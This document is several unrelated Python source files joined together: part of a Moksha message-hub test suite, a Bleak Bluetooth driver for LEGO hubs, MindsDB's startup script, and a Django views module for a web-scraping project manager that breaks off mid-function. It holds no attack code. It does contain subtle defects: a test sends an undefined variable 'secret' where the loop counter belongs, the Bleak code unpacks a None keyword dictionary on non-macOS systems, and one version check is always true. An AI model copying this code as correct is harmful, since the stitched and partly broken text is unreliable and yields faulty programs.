def consume(self, message):
if message['body'] % 2:
raise RuntimeError()
self.hub.config['moksha.blocking_mode'] = True
cons = self.fake_register_consumer(TestConsumer)
for i in range(5):
self.hub.send_message(topic=self.a_topic, message=i)
simulate_reactor(sleep_duration)
sleep(sleep_duration)
eq_(cons.headcount_in, 5)
eq_(cons.headcount_out, 5)
eq_(cons._exception_count, 2)
eq_(len(cons._times), 5)
@testutils.crosstest
def test_consumer_stats_overflow(self):
""" Verify that Consumer._times doesn't grow beyond a maximum size. """
class TestConsumer(moksha.hub.api.consumer.Consumer):
topic = self.a_topic
def consume(self, message):
pass
self.hub.config['moksha.blocking_mode'] = True
cons = self.fake_register_consumer(TestConsumer)
for i in range(1500):
self.hub.send_message(topic=self.a_topic, message=secret)
simulate_reactor(sleep_duration)
sleep(sleep_duration)
eq_(cons.headcount_in, 1500)
eq_(cons.headcount_out, 1500)
eq_(cons._exception_count, 0)
eq_(len(cons._times), 1024)
class TestProducer:
def _setUp(self):
def kernel(config):
self.hub = MokshaHub(config=config)
self.a_topic = a_topic = str(uuid4())
for __setup, name in testutils.make_setup_functions(kernel):
yield __setup, name
def _tearDown(self):
self.hub.close()
def fake_register_producer(self, prod):
""" Fake register a producer, not by entry-point like usual.
Registering producers is a little easier than registering consumers.
The MokshaHub doesn't even keep track of the .poll method callbacks.
We simply instantiate the producer (and it registers itself with the
hub).
"""
return prod(self.hub)
@testutils.crosstest
def test_produce_ten_strs(self):
""" Produce ten-ish strings. """
messages_received = []
class TestProducer(moksha.hub.api.producer.PollingProducer):
topic = self.a_topic
frequency = sleep_duration / 10.9
called = 0
def poll(self):
self.called = self.called + 1
# Ready?
prod = self.fake_register_producer(TestProducer)
def killer():
sleep(sleep_duration)
prod.die = True
threading.Thread(target=killer).start()
prod._work()
# Finally, the check. Did we get our ten messages? (or about as much)
assert prod.called > 8
assert prod.called < 12
@testutils.crosstest
def test_idempotence(self):
""" Test that running the same test twice still works. """
return self.test_produce_ten_strs()
class TestMonitoring:
def _setUp(self):
def kernel(config):
self.hub = CentralMokshaHub(config=config)
self.a_topic = a_topic = str(uuid4())
for __setup, name in testutils.make_setup_functions(kernel):
yield __setup, name
def _tearDown(self):
self.hub.close()
@testutils.crosstest
def test_monitoring(self):
""" Test that the MonitoringProducer works as expected. """
tmpdir = tempfile.mkdtemp()
try:
zmq_file = tmpdir + '/socket'
zmq_socket = 'ipc://' + zmq_file
self.hub.config['moksha.monitoring.socket'] = zmq_socket
self.hub.config['moksha.monitoring.socket.mode'] = '777'
mon = MonitoringProducer(self.hub)
assert_true(os.path.exists(zmq_file))
assert_true(stat.S_IMODE(os.stat(zmq_file).st_mode) == 0o777)
ctx = zmq.Context()
sub = ctx.socket(zmq.SUB)
sub.setsockopt(zmq.RCVTIMEO, 10000)
sub.setsockopt_string(zmq.SUBSCRIBE, u'')
sub.connect(zmq_socket)
data = []
def recv():
data.append(sub.recv())
thread = threading.Thread(target=recv)
thread.start()
sleep(sleep_duration)
mon.poll()
thread.join()
eq_(len(data), 1)
d = json.loads(data[0])
eq_(len(d['consumers']), 0)
eq_(len(d['producers']), 1)
eq_(d['producers'][0]['name'], 'MonitoringProducer')
finally:
shutil.rmtree(tmpdir)
|
cbleak.py
|
import asyncio
import logging
import platform
import queue
import threading
import time
import bleak
from pylgbst.comms import Connection, MOVE_HUB_HW_UUID_CHAR, MOVE_HUB_HW_UUID_SERV
log = logging.getLogger('comms-bleak')
class BleakDriver:
"""Driver that provides interface between API and Bleak."""
def __init__(self, hub_mac=None, hub_name=None):
"""
Initialize new object of Bleak Driver class.
:param hub_mac: Optional Lego HUB MAC to connect to.
"""
self.hub_mac = hub_mac
self.hub_name = hub_name
self._handler = None
self._abort = False
self._connection_thread = None
self._processing_thread = None
# Queues to handle request / responses. Acts as a buffer between API and async BLE driver
self.resp_queue = queue.Queue()
self.req_queue = queue.Queue()
def set_notify_handler(self, handler):
"""
Set handler function used to communicate with an API.
:param handler: Handler function called by driver when received data
:return: None
"""
self._handler = handler
def enable_notifications(self):
"""
Enable notifications, in our cases starts communication threads.
We cannot do this earlier, because API need to fist set notification handler.
:return: None
"""
self._connection_thread = threading.Thread(target=lambda: asyncio.run(self._bleak_thread()))
self._connection_thread.daemon = True
self._connection_thread.start()
self._processing_thread = threading.Thread(target=self._processing)
self._processing_thread.daemon = True
self._processing_thread.start()
async def _bleak_thread(self):
bleak = BleakConnection()
# For MacOS 12+ the service_uuids kwarg is required for scanning
kwargs = None
if "Darwin" == platform.system() and int(platform.mac_ver()[0].split(".")[0]) >= 12:
kwargs = {"service_uuids" : [MOVE_HUB_HW_UUID_SERV]}
await bleak.connect(self.hub_mac, self.hub_name, **kwargs)
await bleak.set_notify_handler((self._safe_handler, self.resp_queue))
# After connecting, need to send any data or hub will drop the connection,
# below command is Advertising name request update
await bleak.write_char(MOVE_HUB_HW_UUID_CHAR, bytearray([0x05, 0x00, 0x01, 0x01, 0x05]))
while not self._abort:
await asyncio.sleep(0.1)
if self.req_queue.qsize() != 0:
data = self.req_queue.get()
await bleak.write(data[0], data[1])
logging.info("Communications thread has exited")
@staticmethod
def _safe_handler(handler, data, resp_queue):
resp_queue.put((handler, data))
def _processing(self):
while not self._abort:
if self.resp_queue.qsize() != 0:
msg = self.resp_queue.get()
self._handler(msg[0], bytes(msg[1]))
time.sleep(0.01)
logging.info("Processing thread has exited")
def write(self, handle, data):
"""
Send data to given handle number.
:param handle: Handle number that will be translated into characteristic uuid
:param data: data to send
:raises ConnectionError" When internal threads are not working
:return: None
"""
if not self._connection_thread.is_alive() or not self._processing_thread.is_alive():
raise ConnectionError('Something went wrong, communication threads not functioning.')
self.req_queue.put((handle, data))
def disconnect(self):
"""
Disconnect and stops communication threads.
:return: None
"""
self._abort = True
def is_alive(self):
"""
Indicate whether driver is functioning or not.
:return: True if driver is functioning; False otherwise.
"""
if self._connection_thread is not None and self._processing_thread is not None:
return self._connection_thread.is_alive() and self._processing_thread.is_alive()
else:
return False
class BleakConnection(Connection):
"""Bleak driver for communicating with BLE device."""
def __init__(self):
"""Initialize new instance of BleakConnection class."""
Connection.__init__(self)
self._device = None
self._client = None
logging.getLogger('bleak.backends.dotnet.client').setLevel(logging.WARNING)
logging.getLogger('bleak.backends.bluezdbus.client').setLevel(logging.WARNING)
async def connect(self, hub_mac=None, hub_name=None, **kwargs):
"""
Connect to device.
:param hub_mac: Optional Lego HUB MAC to connect to
:param hub_name: Optional Lego Hub name to connect to
:kwargs: Optional parameters for bleak.discover
:raises ConnectionError: When cannot connect to given MAC or name matching fails.
:return: None
"""
log.info("Discovering devices... Press green button on Hub")
for i in range(0, 30):
devices = await bleak.discover(timeout=1, **kwargs)
log.debug("Devices: %s", devices)
for dev in devices:
log.debug(dev)
address = dev.address
name = dev.name
if self._is_device_matched(address, name, hub_mac, hub_name):
log.info('Device matched: %r', dev)
self._device = dev
break
else:
continue
break
else:
raise ConnectionError('Device not found.')
self._client = bleak.BleakClient(self._device)
status = await self._client.connect()
log.debug('Connection status: {status}'.format(status=status))
async def write(self, handle, data):
"""
Send data to given handle number.
If handle cannot be found in service description, hardcoded LEGO uuid will be used.
:param handle: Handle number that will be translated into characteristic uuid
:param data: data to send
:return: None
"""
log.debug('Request: {handle} {payload}'.format(handle=handle, payload=[hex(x) for x in data]))
desc = self._client.services.get_descriptor(handle)
if not isinstance(data, bytearray):
data = bytearray(data)
if desc is None:
# dedicated handle not found, try to send by using LEGO Move Hub default characteristic
await self._client.write_gatt_char(MOVE_HUB_HW_UUID_CHAR, data)
else:
await self._client.write_gatt_char(desc.characteristic_uuid, data)
async def write_char(self, characteristic_uuid, data):
"""
Send data to given handle number.
:param characteristic_uuid: Characteristic uuid used to send data
:param data: data to send
:return: None
"""
await self._client.write_gatt_char(characteristic_uuid, data)
async def set_notify_handler(self, inputs):
"""
Set notification handler.
:param handler: Handle function to be called when receive any data.
:return: None
"""
handler, resp_queue = inputs
def c(handle, data):
log.debug('Response: {handle} {payload}'.format(handle=handle, payload=[hex(x) for x in data]))
handler(handle, data, resp_queue)
await self._client.start_notify(MOVE_HUB_HW_UUID_CHAR, c)
def is_alive(self):
"""
To keep compatibility with the driver interface.
This method does nothing.
:return: None.
"""
pass
|
__main__.py
|
import atexit
import traceback
import sys
import os
import time
import asyncio
import signal
import psutil
import torch.multiprocessing as mp
from packaging import version
from mindsdb.api.http.start import start as start_http
from mindsdb.api.mysql.start import start as start_mysql
from mindsdb.api.mongo.start import start as start_mongo
from mindsdb.utilities.config import Config, STOP_THREADS_EVENT
from mindsdb.utilities.ps import is_pid_listen_port, get_child_pids
from mindsdb.utilities.functions import args_parse, get_versions_where_predictors_become_obsolete
from mindsdb.utilities.with_kwargs_wrapper import WithKWArgsWrapper
from mindsdb.utilities.log import log
from mindsdb.interfaces.database.database import DatabaseWrapper
from mindsdb.interfaces.model.model_interface import ray_based, ModelInterface
import mindsdb.interfaces.storage.db as db
COMPANY_ID = os.environ.get('MINDSDB_COMPANY_ID', None)
def close_api_gracefully(apis):
try:
for api in apis.values():
process = api['process']
childs = get_child_pids(process.pid)
for p in childs:
try:
os.kill(p, signal.SIGTERM)
except Exception:
p.kill()
sys.stdout.flush()
process.terminate()
process.join()
sys.stdout.flush()
if ray_based:
os.system('ray stop --force')
except KeyboardInterrupt:
sys.exit(0)
except psutil.NoSuchProcess:
pass
if __name__ == '__main__':
mp.freeze_support()
args = args_parse()
config = Config()
is_cloud = config.get('cloud', False)
if not is_cloud:
print('Applying database migrations:')
try:
from mindsdb.migrations import migrate
migrate.migrate_to_head()
except Exception as e:
print(f'Error! Something went wrong during DB migrations: {e}')
if args.verbose is True:
# Figure this one out later
pass
os.environ['DEFAULT_LOG_LEVEL'] = config['log']['level']['console']
os.environ['LIGHTWOOD_LOG_LEVEL'] = config['log']['level']['console']
# Switch to this once the native interface has it's own thread :/
ctx = mp.get_context('spawn')
from mindsdb.__about__ import __version__ as mindsdb_version
print(f'Version {mindsdb_version}')
print(f'Configuration file:\n {config.config_path}')
print(f"Storage path:\n {config['paths']['root']}")
# @TODO Backwards compatibiltiy for tests, remove later
from mindsdb.interfaces.database.integrations import DatasourceController
dbw = DatabaseWrapper(COMPANY_ID)
model_interface = WithKWArgsWrapper(ModelInterface(), company_id=COMPANY_ID)
datasource_interface = WithKWArgsWrapper(DatasourceController(), company_id=COMPANY_ID)
raw_model_data_arr = model_interface.get_models()
model_data_arr = []
for model in raw_model_data_arr:
if model['status'] == 'complete':
x = model_interface.get_model_data(model['name'])
try:
model_data_arr.append(model_interface.get_model_data(model['name']))
except Exception:
pass
if not is_cloud:
# region Mark old predictors as outdated
is_modified = False
predictor_records = db.session.query(db.Predictor).all()
if len(predictor_records) > 0:
sucess, compatible_versions = get_versions_where_predictors_become_obsolete()
if sucess is True:
compatible_versions = [version.parse(x) for x in compatible_versions]
mindsdb_version_parsed = version.parse(mindsdb_version)
compatible_versions = [x for x in compatible_versions if x <= mindsdb_version_parsed]
if len(compatible_versions) > 0:
last_compatible_version = compatible_versions[-1]
for predictor_record in predictor_records:
if (
isinstance(predictor_record.mindsdb_version, str) is not None
and version.parse(predictor_record.mindsdb_version) < last_compatible_version
):
predictor_record.update_status = 'available'
is_modified = True
if is_modified is True:
db.session.commit()
# endregion
for integration_name in datasource_interface.get_db_integrations(sensitive_info=True):
print(f"Setting up integration: {integration_name}")
if datasource_interface.get_db_integration(integration_name).get('publish', False):
# do setup and register only if it is 'publish' integration
dbw.setup_integration(integration_name)
dbw.register_predictors(model_data_arr, integration_name=integration_name)
for integration_name in config.get('integrations', {}):
try:
it = datasource_interface.get_db_integration(integration_name)
if it is not None:
datasource_interface.remove_db_integration(integration_name)
print(f'Adding: {integration_name}')
datasource_interface.add_db_integration(integration_name, config['integrations'][integration_name]) # Setup for user `None`, since we don't need this for cloud
if config['integrations'][integration_name].get('publish', False) and not is_cloud:
dbw.setup_integration(integration_name)
dbw.register_predictors(model_data_arr, integration_name=integration_name)
except Exception as e:
log.error(f'\n\nError: {e} adding database integration {integration_name}\n\n')
del model_interface
del dbw
# @TODO Backwards compatibiltiy for tests, remove later
if args.api is None:
api_arr = ['http', 'mysql']
else:
api_arr = args.api.split(',')
apis = {
api: {
'port': config['api'][api]['port'],
'process': None,
'started': False
} for api in api_arr
}
start_functions = {
'http': start_http,
'mysql': start_mysql,
'mongodb': start_mongo
}
for api_name, api_data in apis.items():
if api_data['started']:
continue
print(f'{api_name} API: starting...')
try:
if api_name == 'http':
p = ctx.Process(target=start_functions[api_name], args=(args.verbose, args.no_studio))
else:
p = ctx.Process(target=start_functions[api_name], args=(args.verbose,))
p.start()
api_data['process'] = p
except Exception as e:
log.error(f'Failed to start {api_name} API with exception {e}\n{traceback.format_exc()}')
close_api_gracefully(apis)
raise e
atexit.register(close_api_gracefully, apis=apis)
async def wait_api_start(api_name, pid, port):
timeout = 60
start_time = time.time()
started = is_pid_listen_port(pid, port)
while (time.time() - start_time) < timeout and started is False:
await asyncio.sleep(0.5)
started = is_pid_listen_port(pid, port)
return api_name, port, started
async def wait_apis_start():
futures = [
wait_api_start(api_name, api_data['process'].pid, api_data['port'])
for api_name, api_data in apis.items() if 'port' in api_data
]
for i, future in enumerate(asyncio.as_completed(futures)):
api_name, port, started = await future
if started:
print(f"{api_name} API: started on {port}")
else:
log.error(f"ERROR: {api_name} API cant start on {port}")
ioloop = asyncio.get_event_loop()
ioloop.run_until_complete(wait_apis_start())
ioloop.close()
try:
for api_data in apis.values():
api_data['process'].join()
except KeyboardInterrupt:
print('Stopping stream integrations...')
STOP_THREADS_EVENT.set()
print('Closing app...')
|
views.py
|
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.contrib.auth import update_session_auth_hash
from .forms import CreateProject, DeleteProject, ItemName, FieldName, CreatePipeline, LinkGenerator, Scraper, Settings, ShareDB, ChangePass, ShareProject
from django.http import HttpResponseRedirect
from django.http import HttpResponse, HttpResponseNotFound, JsonResponse
from .models import Project, Item, Pipeline, Field, LinkgenDeploy, ScrapersDeploy, Dataset
from django.forms.util import ErrorList
from itertools import groupby
from django.core.urlresolvers import reverse
import os
import shutil
from string import Template
from .scrapy_packages import settings
from pymongo import MongoClient
import glob
import subprocess
import requests
import json
import datetime
import dateutil.parser
import socket
from django.contrib.auth.models import User
from bson.json_util import dumps
import threading
import crypt
try:
# Python 3
from urllib.parse import urlparse
except ImportError:
# Python 2
from urlparse import urlparse
try:
from urllib.parse import quote
except:
from urllib import quote
def generate_default_settings():
settings = """# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'unknown'
# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'"""
return settings
@login_required
def main_page(request):
projects = Project.objects.filter(user=request.user)
datasets = Dataset.objects.filter(user=request.user)
userprojects = []
databases = []
for project in projects:
singleproject = {}
singleproject['name'] = project.project_name
userprojects.append(singleproject)
for dataset in datasets:
databases.append(dataset.database)
return render(request, template_name="mainpage.html",
context={'username': request.user.username, 'projects': userprojects, 'databases': databases})
@login_required
def create_new(request):
if request.method == 'GET':
form = CreateProject()
return render(request, 'createproject.html', {'username': request.user.username, 'form': form})
if request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("mainpage"))
elif 'submit' in request.POST:
form = CreateProject(request.POST)
if form.is_valid():
allprojects =[]
userprojects = Project.objects.filter(user=request.user)
for project in userprojects:
allprojects.append(project.project_name)
if form.cleaned_data['projectname'] in allprojects:
errors = form._errors.setdefault("projectname", ErrorList())
errors.append('Project named %s already exists. Please choose another name' % form.cleaned_data['projectname'])
return render(request, 'createproject.html', {'username': request.user.username, 'form': form})
else:
project = Project()
project.project_name = form.cleaned_data['projectname']
project.user = request.user
project.settings_scraper = generate_default_settings()
project.settings_link_generator = generate_default_settings()
project.scraper_function = '''def parse(self, response):\n pass'''
project.link_generator = '''start_urls = [""]\ndef parse(self, response):\n pass'''
project.save()
# project data will be saved in username_projectname database, so we need to
# give the current user ownership of that database
mongodbname = request.user.username + "_" + project.project_name
mongouri = "mongodb://" + settings.MONGODB_USER + ":" + quote(settings.MONGODB_PASSWORD) + "@" + settings.MONGODB_URI + "/admin"
connection = MongoClient(mongouri)
connection.admin.command('grantRolesToUser', request.user.username,
roles=[{'role': 'dbOwner', 'db': mongodbname}])
connection.close()
dataset = Dataset()
dataset.user = request.user
dataset.database = mongodbname
dataset.save()
return HttpResponseRedirect(reverse("manageproject", args=(project.project_name,)))
else:
return render(request, 'createproject.html', {'username': request.user.username, 'form': form})
else:
return HttpResponseNotFound('Nothing is here.')
@login_required
def manage_project(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
projectdata = {}
projectdata['settings_scraper'] = project.settings_scraper
projectdata['settings_link_generator'] = project.settings_link_generator
projectdata['items'] = []
projectdata['pipelines'] = []
if len(project.link_generator) == 0:
projectdata['link_generator'] = False
else:
projectdata['link_generator'] = True
if len(project.scraper_function) == 0:
projectdata['scraper_function'] = False
else:
projectdata['scraper_function'] = True
items = Item.objects.filter(project=project)
pipelines = Pipeline.objects.filter(project=project)
for item in items:
projectdata['items'].append(item)
for pipeline in pipelines:
projectdata['pipelines'].append(pipeline)
return render(request, 'manageproject.html',
{'username': request.user.username, 'project': project.project_name, 'projectdata': projectdata})
@login_required
def delete_project(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
form = DeleteProject()
return render(request, 'deleteproject.html', {'username': request.user.username, 'form': form, 'projectname': projectname})
if request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("mainpage"))
elif 'submit' in request.POST:
project.delete()
return HttpResponseRedirect(reverse("mainpage"))
else:
return HttpResponseNotFound('Nothing is here.')
@login_required
def create_item(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
form1 = ItemName()
form2 = FieldName()
return render(request, 'additem.html',
{'username': request.user.username, 'form1': form1, 'form2': form2, 'project': project.project_name})
if request.method == 'POST':
if 'submit' in request.POST:
form1 = ItemName(request.POST)
form2 = FieldName(request.POST, extra=request.POST.get('extra_field_count'))
if form1.is_valid() and form2.is_valid():
item = Item.objects.filter(project=project, item_name=form1.cleaned_data['itemname'])
if len(item):
errors = form1._errors.setdefault("itemname", ErrorList())
errors.append(
'Item named %s already exists. Please choose another name' % form1.cleaned_data['itemname'])
return render(request, 'additem.html',
{'username': request.user.username, 'form1': form1,
'form2': form2, 'project': project.project_name})
allfields =[]
valuetofield = {}
for field in form2.fields:
if form2.cleaned_data[field]:
if field != 'extra_field_count':
valuetofield[form2.cleaned_data[field]] = field
allfields.append(form2.cleaned_data[field])
duplicates = [list(j) for i, j in groupby(allfields)]
for duplicate in duplicates:
if len(duplicate) > 1:
errors = form2._errors.setdefault(valuetofield[duplicate[0]], ErrorList())
errors.append('Duplicate fields are not allowed.')
return render(request, 'additem.html',
{'username': request.user.username, 'form1': form1,
'form2': form2, 'project': project.project_name})
item = Item()
item.item_name = form1.cleaned_data['itemname']
item.project = project
item.save()
for field in allfields:
onefield = Field()
onefield.item = item
onefield.field_name = field
onefield.save()
return HttpResponseRedirect(reverse("listitems", args=(project.project_name,)))
else:
return render(request, 'additem.html',
{'username': request.user.username, 'form1': form1,
'form2': form2, 'project': project.project_name})
elif 'cancel' in request.POST:
return HttpResponseRedirect(reverse("listitems", args=(project.project_name,)))
else:
form1 = ItemName(request.POST)
form2 = FieldName(request.POST, extra=request.POST.get('extra_field_count'))
return render(request, 'additem.html',
{'username': request.user.username, 'form1': form1,
'form2': form2, 'project': project.project_name})
@login_required
def itemslist(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
itemtracker = 0
items = Item.objects.filter(project=project)
itemdata = []
for item in items:
itemdata.append([])
itemdata[itemtracker].append(item.item_name)
fields = Field.objects.filter(item=item)
if fields:
itemdata[itemtracker].append([])
for field in fields:
itemdata[itemtracker][1].append(field.field_name)
itemtracker += 1
return render(request, 'itemslist.html',
{'username': request.user.username, 'project': project.project_name, 'items': itemdata})
@login_required
def deleteitem(request, projectname, itemname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
try:
item = Item.objects.get(project=project, item_name=itemname)
except Item.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
# using the form that was used for deleting the project
form = DeleteProject()
return render(request, 'deleteitem.html',
{'username': request.user.username, 'form': form, 'projectname': projectname, 'itemname': itemname})
elif request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("listitems", args=(projectname,)))
elif 'submit' in request.POST:
item.delete()
return HttpResponseRedirect(reverse("listitems", args=(projectname,)))
@login_required
def edititem(request, projectname, itemname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
try:
item = Item.objects.get(project=project, item_name=itemname)
except Item.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
fields = Field.objects.filter(item=item)
fieldcounter = 0
fieldlist = []
fielddata = {}
for field in fields:
fieldlist.append(field.field_name)
fieldcounter += 1
if fieldcounter == 1:
fielddata['fieldname'] = fieldlist[0]
fielddata['extra_field_count'] = 0
elif fieldcounter > 1:
fielddata['fieldname'] = fieldlist[0]
fielddata['extra_field_count'] = fieldcounter - 1
for i in range(1,fieldcounter):
fielddata['field_%d' % (i+1)] = fieldlist[i]
form1 = ItemName({'itemname': itemname})
form2 = FieldName(initial=fielddata, extra=fielddata['extra_field_count'])
return render(request, 'edititem.html',
{'username': request.user.username, 'form1': form1, 'form2': form2, 'project': project.project_name})
elif request.method == 'POST':
if 'submit' in request.POST:
form1 = ItemName(request.POST)
form2 = FieldName(request.POST, extra=request.POST.get('extra_field_count'))
if form1.is_valid() and form2.is_valid():
newitemname = Item.objects.filter(project=project, item_name=form1.cleaned_data['itemname'])
if len(newitemname):
for oneitem in newitemname:
if oneitem.item_name != item.item_name:
errors = form1._errors.setdefault('itemname', ErrorList())
errors.append('Item named %s already exists. Please choose another name' % form1.cleaned_data['itemname'])
return render(request, 'edititem.html',
{'username': request.user.username, 'form1': form1,
'form2': form2, 'project': project.project_name})
allfields = []
valuetofield = {}
for field in form2.fields:
if form2.cleaned_data[field]:
if field != 'extra_field_count':
valuetofield[form2.cleaned_data[field]] = field
allfields.append(form2.cleaned_data[field])
duplicates = [list(j) for i, j in groupby(allfields)]
for duplicate in duplicates:
if len(duplicate) > 1:
errors = form2._errors.setdefault(valuetofield[duplicate[0]], ErrorList())
errors.append('Duplicate fields are not allowed.')
return render(request, 'edititem.html',
{'username': request.user.username, 'form1': form1,
'form2': form2, 'project': project.project_name})
deletefield = Field.objects.filter(item=item)
for field in deletefield:
field.delete()
item.item_name = form1.cleaned_data['itemname']
item.save()
for field in allfields:
onefield = Field()
onefield.item = item
onefield.field_name = field
onefield.save()
return HttpResponseRedirect(reverse("listitems", args=(project.project_name,)))
elif 'cancel' in request.POST:
return HttpResponseRedirect(reverse("listitems", args=(project.project_name,)))
else:
form1 = ItemName(request.POST)
form2 = FieldName(request.POST, extra=request.POST.get('extra_field_count'))
return render(request, 'edititem.html',
{'username': request.user.username, 'form1': form1,
'form2': form2, 'project': project.project_name})
@login_required
def addpipeline(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
defined_items = {}
items = Item.objects.filter(project=project)
for item in items:
defined_items[item.item_name] = []
fields = Field.objects.filter(item=item)
for field in fields:
defined_items[item.item_name].append(field.field_name)
if request.method == 'GET':
initial_code = '''def process_item(self, item, spider):\n return item
'''
form = CreatePipeline(initial={'pipelinefunction': initial_code})
return render(request, "addpipeline.html",
{'username': request.user.username, 'form': form, 'project': project.project_name, 'items': defined_items})
elif request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("listpipelines", args=(project.project_name,)))
if 'submit' in request.POST:
form = CreatePipeline(request.POST)
if form.is_valid():
names = []
orders =[]
pipelines = Pipeline.objects.filter(project=project)
for pipeline in pipelines:
names.append(pipeline.pipeline_name)
orders.append(pipeline.pipeline_order)
if form.cleaned_data['pipelinename'] in names:
errors = form._errors.setdefault('pipelinename', ErrorList())
errors.append(
'Pipeline named %s already exists. Please choose another name' % form.cleaned_data['pipelinename'])
return render(request, "addpipeline.html",
{'username': request.user.username, 'form': form, 'project': project.project_name, 'items': defined_items})
if int(form.cleaned_data['pipelineorder']) in orders:
errors = form._errors.setdefault('pipelineorder', ErrorList())
errors.append(
'Pipeline order %s already exists for another pipeline function. Enter a different order' % form.cleaned_data['pipelineorder'])
return render(request, "addpipeline.html",
{'username': request.user.username, 'form': form, 'project': project.project_name, 'items': defined_items})
pipeline = Pipeline()
pipeline.pipeline_name = form.cleaned_data['pipelinename']
pipeline.pipeline_order = form.cleaned_data['pipelineorder']
pipeline.pipeline_function = form.cleaned_data['pipelinefunction']
pipeline.project = project
pipeline.save()
return HttpResponseRedirect(reverse("listpipelines", args=(project.project_name,)))
else:
return render(request, "addpipeline.html",
{'username': request.user.username, 'form': form, 'project': project.project_name, 'items': defined_items})
@login_required
def pipelinelist(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
itemtracker = 0
pipelines = Pipeline.objects.filter(project=project)
pipelinedata = []
for pipeline in pipelines:
pipelinedata.append([])
pipelinedata[itemtracker].append(pipeline.pipeline_name)
pipelinedata[itemtracker].append(pipeline.pipeline_order)
itemtracker += 1
return render(request, 'pipelinelist.html', {'username': request.user.username, 'project': project.project_name, 'items': pipelinedata})
@login_required
def editpipeline(request, projectname, pipelinename):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
try:
pipeline = Pipeline.objects.get(project=project, pipeline_name=pipelinename)
except Pipeline.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
defined_items = {}
items = Item.objects.filter(project=project)
for item in items:
defined_items[item.item_name] = []
fields = Field.objects.filter(item=item)
for field in fields:
defined_items[item.item_name].append(field.field_name)
if request.method == 'GET':
form = CreatePipeline(initial={'pipelinename': pipeline.pipeline_name,
'pipelineorder': pipeline.pipeline_order,
'pipelinefunction': pipeline.pipeline_function})
return render(request, "editpipeline.html",
{'username': request.user.username, 'form': form, 'project': project.project_name, 'items': defined_items})
elif request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("listpipelines", args=(project.project_name,)))
if 'submit' in request.POST:
form = CreatePipeline(request.POST)
if form.is_valid():
newpipelinename = Pipeline.objects.filter(project=project, pipeline_name=form.cleaned_data['pipelinename'])
if len(newpipelinename):
for oneitem in newpipelinename:
if oneitem.pipeline_name != pipeline.pipeline_name:
errors = form._errors.setdefault('pipelinename', ErrorList())
errors.append(
'Pipeline named %s already exists. Please choose another name' % form.cleaned_data[
'pipelinename'])
return render(request, 'editpipeline.html',
{'username': request.user.username, 'form': form, 'project': project.project_name, 'items': defined_items})
newpipelineorder = Pipeline.objects.filter(project=project,
pipeline_order=form.cleaned_data['pipelineorder'])
if len(newpipelineorder):
for oneitem in newpipelineorder:
if oneitem.pipeline_order != pipeline.pipeline_order:
errors = form._errors.setdefault('pipelineorder', ErrorList())
errors.append(
'Pipeline order %s already exists for another pipeline function. Enter a different order' % form.cleaned_data['pipelineorder'])
return render(request, 'editpipeline.html',
{'username': request.user.username, 'form': form, 'project': project.project_name, 'items': defined_items})
pipeline.pipeline_name = form.cleaned_data['pipelinename']
pipeline.pipeline_order = form.cleaned_data['pipelineorder']
pipeline.pipeline_function = form.cleaned_data['pipelinefunction']
pipeline.save()
return HttpResponseRedirect(reverse("listpipelines", args=(project.project_name,)))
else:
return render(request, "editpipeline.html",
